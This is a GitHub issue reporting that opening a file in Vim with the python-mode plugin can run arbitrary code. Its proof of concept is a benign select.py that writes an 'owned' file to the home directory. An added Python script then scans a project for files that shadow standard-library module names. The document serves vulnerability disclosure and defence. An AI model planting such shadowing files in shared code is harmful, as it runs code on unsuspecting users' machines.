arbitrary code execution is possible when using python-mode #162

Closed
@kholia

Hi,

It is possible to achieve arbitrary code execution when using python-mode.

➜  cat > select.py
import os

homedir = os.path.expanduser("~")

with open(os.path.join(homedir, "owned"), "w") as f:
    f.write("owned")

print "owned"

➜  vim select.py
owned
Press ENTER or type command to continue

➜  cat ~/owned 
owned

➜ vim --version
VIM - Vi IMproved 7.3 (2010 Aug 15, compiled Oct 23 2012 18:42:18)
Included patches: 1-712
Compiled by ArchLinux

Care should be taken when opening source code from untrusted sources.

Regards,
Dhiru
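
A pre-open check in the spirit of the report's closing advice, added here as an example and not part of the original report or of python-mode: it lists files in a checkout whose names collide with Python standard-library modules. It assumes, which the report does not state, that `select.py` ran because it shadowed the standard-library `select` module on the plugin's import path; `find_shadowing_files`, `demo` and the sample tree are constructed for illustration.

```python
import os
import sys
import tempfile

# Python 3.10+ lists every stdlib module; older interpreters fall back to the
# built-in names plus a short hand-picked set (constructed for this example).
STDLIB_NAMES = frozenset(
    getattr(sys, "stdlib_module_names", None)
    or set(sys.builtin_module_names) | {"select", "os", "socket", "json", "re"}
)


def find_shadowing_files(root, names=STDLIB_NAMES):
    """Return sorted paths (relative to root) of modules and packages whose
    import name equals a standard-library module name."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        for fn in filenames:
            stem, ext = os.path.splitext(fn)
            if ext in (".py", ".pyc") and stem in names:
                hits.append(os.path.relpath(os.path.join(dirpath, fn), root))
        for d in dirnames:
            # A directory only shadows a module if it is an importable package.
            if d in names and os.path.isfile(os.path.join(dirpath, d, "__init__.py")):
                hits.append(os.path.relpath(os.path.join(dirpath, d), root))
    return sorted(hits)


def demo():
    """Build a constructed sample checkout in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for rel in ("select.py", "app/main.py", "app/utils.py", "vendor/json/__init__.py"):
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as f:
                f.write("# constructed sample file\n")
        return find_shadowing_files(root)


if __name__ == "__main__":
    # A hit matters only if its directory ends up on the tool's sys.path.
    for hit in demo():
        print("shadows stdlib module:", hit)
```
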
